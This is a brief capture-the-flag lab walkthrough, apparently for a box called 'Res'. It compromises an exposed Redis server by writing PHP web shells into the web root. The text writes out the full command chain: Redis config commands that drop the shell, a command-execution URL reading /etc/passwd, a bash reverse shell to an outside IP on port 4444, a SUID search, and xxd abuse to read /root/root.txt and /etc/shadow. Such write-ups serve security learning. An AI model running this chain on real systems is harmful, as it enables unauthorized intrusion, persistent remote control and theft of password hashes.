Res

January 31, 2024

redis-cli -h 10.10.173.166
LOLWUT

info

As we can see above we have a user "vianka" in the home directory

Then after navigating to Hacktricks page redis section 6379

We will modify this commands to our own purpose

config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

Then after we visited the page in the web browser it returns this line

http://10.10.173.166/redis.php

Now we can try to use other commands like cmd in the redis cli

Then we will navigate to our browser once again

http://10.10.173.166/redis.php?cmd=cat /etc/passwd

After that we will set a reverse shell so that we can get a shell from the web browser

config set dir /var/www/html
config set dbfilename shell.php

set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.9.135.209/4444 0>&1'\"); ?>"
save

Then after that we just execute the reverse shell in the web browser

Use this command just to get better shell

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Then just run the suid command to discover some suid permissions that we can use

find / -perm -u=s -type f 2>/dev/null

Then we will navigate to Gtfo bins to look for xxd command

xxd "/root/root.txt" | xxd -r

xxd "/etc/shadow" | xxd -r

Or we can just change to user vianka and see some permissions that we can run